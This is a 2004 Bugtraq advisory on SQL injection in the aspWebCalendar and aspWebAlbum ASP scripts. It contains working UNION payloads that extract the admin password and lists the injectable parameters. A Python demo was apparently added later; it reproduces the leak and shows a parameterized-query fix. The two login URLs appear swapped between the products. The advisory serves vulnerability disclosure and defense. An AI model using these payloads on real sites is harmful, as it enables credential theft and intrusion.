
List:       bugtraq
Subject:    aspWebCalendar /aspWebAlbum: SQL injection
From:       Pedro Sanches <pedro_sanches () sapo ! pt>
Date:       2004-09-23 18:27:02
Message-ID: 20040923182702.17881.qmail () www ! securityfocus ! com



[1]Introduction

"aspWebCalendar is an .asp (Active Server Pages) script that allows you to easily create an online events calendar that supports multiple users. Easy installation and usage are the key features of aspWebCalendar. The script contains a text file with a few configuration variables that are used by the script... Just change one of these variables, upload the files and you are up and running."

"aspWebAlbum is an .asp (Active Server Pages) script that allows you to easily create an online photo album or gallery simply by uploading images to your server... the script will do the rest. Easy installation and usage are the key features of aspWebAlbum. The script contains a text file with several configuration variables that are used by the script... just change two of these and you are up and running. To add images simply upload them to your server, it's that simple."

This information was taken from http://www.jancw.dk/, but the vendor of this software is Full Revolution and the website can be found at www.fullrevolution.com


[2]The Problem

Both scripts can run on SQL or Access databases, and both database setups ship out of the box. Installations that use the default SQL file are vulnerable to SQL injection, allowing, for example, an attacker to read table contents through the ASP error messages.

(1) For the aspWebCalendar, in the login page:

"www.example.com/album.asp?action=login"

you can put this in the username field (leaving the password blank) to extract the password for the 'admin' user, if it exists:

"  ' union select Cal_User_Password,1,1,1,1,1,1,1,1,1 from Cal_User where Cal_User_UserName = 'admin'--  "

  (1.1) The 'eventid' parameter is vulnerable to SQL injection too:
	"www.example.com/calendar.asp?action=eventdetail&eventid='"



(2) For the aspWebAlbum, the login page can be found at "www.example.com/calendar.asp?action=login" and the problem is the same (I'll use the same example as above):

	"' union select Gal_UserPassword,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from Gal_Users where Gal_UserUserName = 'admin' --"

	(2.2) The 'cat' parameter is also vulnerable in this script:
	     "www.example.com/album.asp?cat='"


At the moment all the SQL versions of this software seem to be affected.
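To show why the UNION payload above works and what closes the hole, here is an added Python/sqlite3 stand-in for the login query (not the vendor's ASP code; the real Cal_User schema is not on the page, so the table below is constructed with ten columns only so that the posted payload's column count lines up). The vulnerable function concatenates the form field into the SQL text; the fixed one binds it as a parameter.

```python
import sqlite3

# Constructed stand-in schema (assumption: ten columns, matching the nine "1"s
# plus the password column in the posted payload; the real schema is unknown).
SCHEMA = """
CREATE TABLE Cal_User (
    Cal_User_ID INTEGER PRIMARY KEY,
    Cal_User_UserName TEXT,
    Cal_User_Password TEXT,
    c4 TEXT, c5 TEXT, c6 TEXT, c7 TEXT, c8 TEXT, c9 TEXT, c10 TEXT
);
INSERT INTO Cal_User VALUES (1, 'admin', 'constructed-admin-pw', '', '', '', '', '', '', '');
"""

# The username value from the advisory, verbatim.
PAYLOAD = ("' union select Cal_User_Password,1,1,1,1,1,1,1,1,1 from Cal_User "
           "where Cal_User_UserName = 'admin'--")


def make_db():
    """In-memory database with one admin row (constructed sample data)."""
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def login_vulnerable(db, username, password):
    """Builds the query by string concatenation, as the affected script appears to.
    The payload closes the quote, appends a UNION that selects the admin password
    into the first column, and comments out the password check."""
    sql = ("SELECT * FROM Cal_User WHERE Cal_User_UserName = '" + username
           + "' AND Cal_User_Password = '" + password + "'")
    return db.execute(sql).fetchall()


def login_fixed(db, username, password):
    """Same query with bound parameters: the input is data, never SQL syntax,
    so the payload simply matches no user."""
    sql = ("SELECT * FROM Cal_User "
           "WHERE Cal_User_UserName = ? AND Cal_User_Password = ?")
    return db.execute(sql, (username, password)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", login_vulnerable(db, PAYLOAD, ""))  # leaks the password
    print("fixed:     ", login_fixed(db, PAYLOAD, ""))       # []
```

The vulnerable call returns a row whose first column is the admin password even though the password field was blank; the parameterized call returns nothing, and a correct username/password pair still logs in.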


[3]Timeline

(28/8/2004) vulnerability discovered
(29/8/2004) short note posted at johnny.ihackstuff.com forums
(15/9/2004) vendor notified, still no reply


[4]Feedback

cybercide@megamail.pt

(This is my first vulnerability disclosure so if there's a mistake here don't hurt me too much :-) )

